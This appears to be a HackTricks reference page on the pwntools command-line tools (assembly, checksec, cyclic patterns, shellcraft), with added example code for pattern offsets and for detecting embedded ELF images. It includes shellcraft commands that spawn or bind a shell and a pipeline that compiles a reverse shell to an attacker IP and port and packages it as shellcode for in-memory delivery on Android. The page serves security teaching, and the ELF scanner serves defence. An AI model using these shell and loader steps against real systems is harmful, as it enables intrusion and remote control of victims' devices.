# PwnTools

{{#include ../../../banners/hacktricks-training.md}}

```
pip3 install pwntools
```

## Pwn asm

Get **opcodes** from a line or from a file.

```
pwn asm "jmp esp"
pwn asm -i <file>
```

**Can select:**

- output type (raw, hex, string, elf)
- output file
- context (16, 32, 64, linux, windows...)
- avoid bytes (new lines, null, a list)
- select encoder
- debug shellcode using gdb
- run the output

## **Pwn checksec**

Checksec script

```
pwn checksec <binary>
```

## Pwn constgrep

## Pwn cyclic

Get a pattern

```
pwn cyclic 3000
pwn cyclic -l faad
```

**Can select:**

- The used alphabet (lowercase chars by default)
- Length of unique pattern (default 4)
- context (16, 32, 64, linux, windows...)
- Take the offset (-l)

## Pwn debug

Attach GDB to a process

```
pwn debug --exec /bin/bash
pwn debug --pid 1234
pwn debug --process bash
```

**Can select:**

- By executable, by name or by pid
- context (16, 32, 64, linux, windows...)
- gdbscript to execute
- sysrootpath

## Pwn disablenx

Disable NX of a binary

```
pwn disablenx <binary>
```

## Pwn disasm

Disassemble hex opcodes

```
pwn disasm ffe4
```

**Can select:**

- context (16, 32, 64, linux, windows...)
- base address
- color (default) / no color

## Pwn elfdiff

Print differences between 2 files

```
pwn elfdiff <file1> <file2>
```

## Pwn hex

Get hexadecimal representation

```bash
pwn hex hola #Get hex of "hola" ascii
```

## Pwn phd

Get hexdump

```
pwn phd <file>
```

**Can select:**

- Number of bytes to show
- Number of bytes per line
- highlight byte
- Skip bytes at beginning

## Pwn pwnstrip

## Pwn scramble

## Pwn shellcraft

Get shellcodes

```
pwn shellcraft -l #List shellcodes
pwn shellcraft -l amd #Shellcode with amd in the name
pwn shellcraft -f hex amd64.linux.sh #Output as hex
pwn shellcraft -r amd64.linux.sh #Run to test, get a shell
pwn shellcraft -r amd64.linux.bindsh 9095 #Bind SH to port
```

**Can select:**

- shellcode and arguments for the shellcode
- Out file
- output format
- debug (attach dbg to shellcode)
- before (debug trap before code)
- after
- avoid using opcodes (default: not null and new line)
- Run the shellcode
- Color/no color
- list syscalls
- list possible shellcodes
- Generate ELF as a shared library

## Pwn template

Get a python template

```
pwn template
```

**Can select:** host, port, user, pass, path and quiet

## Pwn unhex

From hex to string

```
pwn unhex 686f6c61
```

## Pwn update

To update pwntools

```
pwn update
```

## ELF → raw shellcode packaging (loader_append)

Pwntools can turn a standalone ELF into a single raw shellcode blob that self-maps its segments and transfers execution to the original entrypoint. This is ideal for memory-only loaders (e.g., Android apps invoking JNI to execute downloaded bytes).

Typical pipeline (amd64 example):

1) Build a static, position-independent payload ELF (musl recommended for portability):

```bash
musl-gcc -O3 -s -static -o exploit exploit.c \
  -DREV_SHELL_IP="\"10.10.14.2\"" -DREV_SHELL_PORT="\"4444\""
```

2) Convert ELF → shellcode with pwntools:

```python
# exp2sc.py
from pwn import *

context.clear(arch='amd64')
elf = ELF('./exploit')
# loader_append prepends a small loader stub to the raw ELF bytes
sc = asm(shellcraft.loader_append(elf.data, arch='amd64'))
with open('sc', 'wb') as f:
    f.write(sc)
print(f"ELF size={len(elf.data)} bytes, shellcode size={len(sc)} bytes")
```

3) Deliver `sc` to a memory loader (e.g., via HTTP[S]) and execute in-process.

Notes

- loader_append embeds the original ELF program into the shellcode and emits a tiny loader that mmaps the segments and jumps to the entry.
- Be explicit about the architecture via `context.clear(arch=...)`. arm64 is common on Android.
- Keep your payload's code position-independent and avoid assumptions about process ASLR/NX.
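The `pwn cyclic` section above shows the two commands but not what they compute. The following is an added example, not pwntools' own code: a pure-Python re-implementation of the de Bruijn sequence that `pwn cyclic` emits (alphabet `a-z`, subsequence length 4, pwntools' defaults) and of the offset lookup that `pwn cyclic -l` performs. The function names `cyclic` and `cyclic_find` deliberately mirror pwntools' API, but this code runs without pwntools installed; the offsets used in the `__main__` block are constructed sample values.

```python
import string
from functools import lru_cache
from itertools import islice

ALPHABET = string.ascii_lowercase  # pwntools' default alphabet
N = 4                              # default unique-subsequence length


def de_bruijn(alphabet=ALPHABET, n=N):
    """Yield the de Bruijn sequence B(k, n) over `alphabet`, one symbol at a time.

    Every length-n window occurs exactly once (reading cyclically), which is
    what makes the crash-offset lookup unambiguous. Standard FKM algorithm.
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, alphabet=ALPHABET, n=N):
    """Equivalent of `pwn cyclic <length>`: the first `length` bytes of the pattern."""
    if length > len(alphabet) ** n:
        raise ValueError("pattern would repeat; raise n or enlarge the alphabet")
    return "".join(islice(de_bruijn(alphabet, n), length)).encode()


@lru_cache(maxsize=None)
def _full_pattern(alphabet=ALPHABET, n=N):
    # The whole sequence (26**4 bytes for the defaults); cached so repeated
    # lookups do not regenerate it.
    return "".join(de_bruijn(alphabet, n)).encode()


def cyclic_find(subseq, alphabet=ALPHABET, n=N):
    """Equivalent of `pwn cyclic -l <value>`: offset of `subseq` in the pattern, or -1.

    Accepts bytes/str as read from a hexdump, or an int as read from a register:
    the low n bytes are taken little-endian, so a RIP of 0x64616166 means b'faad'.
    """
    if isinstance(subseq, int):
        subseq = (subseq & ((1 << (8 * n)) - 1)).to_bytes(n, "little")
    if isinstance(subseq, str):
        subseq = subseq.encode()
    return _full_pattern(alphabet, n).find(subseq)


if __name__ == "__main__":
    pat = cyclic(3000)
    print(pat[:40].decode(), "...")
    # Constructed sample: pretend the crash overwrote a register with pattern bytes
    crashed_register = int.from_bytes(pat[1234:1238], "little")
    print(f"register {crashed_register:#x} -> offset {cyclic_find(crashed_register)}")
```

The uniqueness of every 4-byte window is the whole point: a longer pattern with a repeating alphabet (for example `AAAA...`) tells you that a register was clobbered but not where in the input the clobbering bytes came from.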
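As a defender-side complement to the loader_append section above, here is an added example (not part of this page, pwntools or CoRPhone) that scans a downloaded blob for an ELF image that does not start at offset 0, which is the shape a loader_append package has: a small loader stub followed by the original ELF. It parses the embedded header with the standard ELF32/ELF64 layout and reports class, endianness, machine type and entry point, which is enough to triage what a memory-only loader was about to run. The sample blob is constructed inline from placeholder bytes plus a synthetic header; it contains no real loader or shellcode.

```python
import struct

ELF_MAGIC = b"\x7fELF"
MACHINES = {0x03: "x86", 0x28: "arm", 0x3E: "x86-64", 0xB7: "aarch64"}
TYPES = {1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}
# Header fields after e_ident: type, machine, version, entry, phoff, shoff,
# flags, ehsize, phentsize, phnum, shentsize, shnum, shstrndx
FMT64 = "16sHHIQQQIHHHHHH"
FMT32 = "16sHHIIIIIHHHHHH"


def parse_elf_header(data, off=0):
    """Parse an ELF header starting at data[off]; returns a dict, or None if the
    bytes are not a plausible header (bad class/endianness/version or truncated)."""
    ident = data[off:off + 16]
    if len(ident) < 16 or ident[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = ident[4], ident[5]
    endian = {1: "<", 2: ">"}.get(ei_data)
    fmt = {1: FMT32, 2: FMT64}.get(ei_class)
    if endian is None or fmt is None:
        return None
    fmt = endian + fmt
    size = struct.calcsize(fmt)
    if len(data) - off < size:
        return None
    f = struct.unpack(fmt, data[off:off + size])
    e_type, e_machine, e_version, e_entry, e_phoff = f[1:6]
    e_phentsize, e_phnum = f[9], f[10]
    if e_version != 1:
        return None
    return {
        "offset": off,
        "bits": 64 if ei_class == 2 else 32,
        "endian": "little" if ei_data == 1 else "big",
        "type": TYPES.get(e_type, f"unknown({e_type})"),
        "machine": MACHINES.get(e_machine, f"unknown({e_machine:#x})"),
        "entry": e_entry,
        "phoff": e_phoff,
        "phnum": e_phnum,
        "phentsize": e_phentsize,
    }


def find_embedded_elfs(blob):
    """Return a header dict for every plausible ELF image inside blob, including
    images that do not start at offset 0 (loader stub + appended ELF)."""
    hits = []
    pos = blob.find(ELF_MAGIC)
    while pos != -1:
        hdr = parse_elf_header(blob, pos)
        if hdr is not None:
            hits.append(hdr)
        pos = blob.find(ELF_MAGIC, pos + 1)
    return hits


def classify_blob(blob):
    """Triage label for a blob: plain ELF, loader-prefixed ELF, or no ELF at all."""
    hits = find_embedded_elfs(blob)
    if not hits:
        return "no ELF header"
    if hits[0]["offset"] == 0:
        return "plain ELF"
    return f"ELF embedded at offset {hits[0]['offset']} (loader stub + appended image)"


# --- Constructed test fixture: a bare little-endian ELF64 header, no segments ---
def build_elf64_header(machine, e_type, entry):
    """Build a minimal ELF64 header for testing; not a loadable program."""
    ident = ELF_MAGIC + bytes([2, 1, 1, 0, 0]) + b"\x00" * 7
    return struct.pack("<" + FMT64, ident, e_type, machine, 1, entry,
                       64, 0, 0, 64, 56, 0, 64, 0, 0)


STUB = b"\x41" * 40  # placeholder bytes standing in for a loader stub (not real code)
SAMPLE_ELF = build_elf64_header(0x3E, 2, 0x401000)
SAMPLE_BLOB = STUB + SAMPLE_ELF

if __name__ == "__main__":
    for h in find_embedded_elfs(SAMPLE_BLOB):
        print(f"ELF at {h['offset']:#x}: {h['bits']}-bit {h['endian']} "
              f"{h['machine']} {h['type']} entry={h['entry']:#x}")
    print(classify_blob(SAMPLE_BLOB))
```

In a real pipeline you would run this over anything an app fetches and hands to `mmap`/JNI; an ELF magic at a non-zero offset inside an opaque download is a strong signal worth alerting on, and the reported machine type tells you immediately whether the payload targets the device architecture (arm64 on most Android devices).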
## References

- [Pwntools](https://docs.pwntools.com/en/stable/)
- [CoRPhone – ELF→shellcode pipeline used for Android in-memory execution](https://github.com/0xdevil/corphone)

{{#include ../../../banners/hacktricks-training.md}}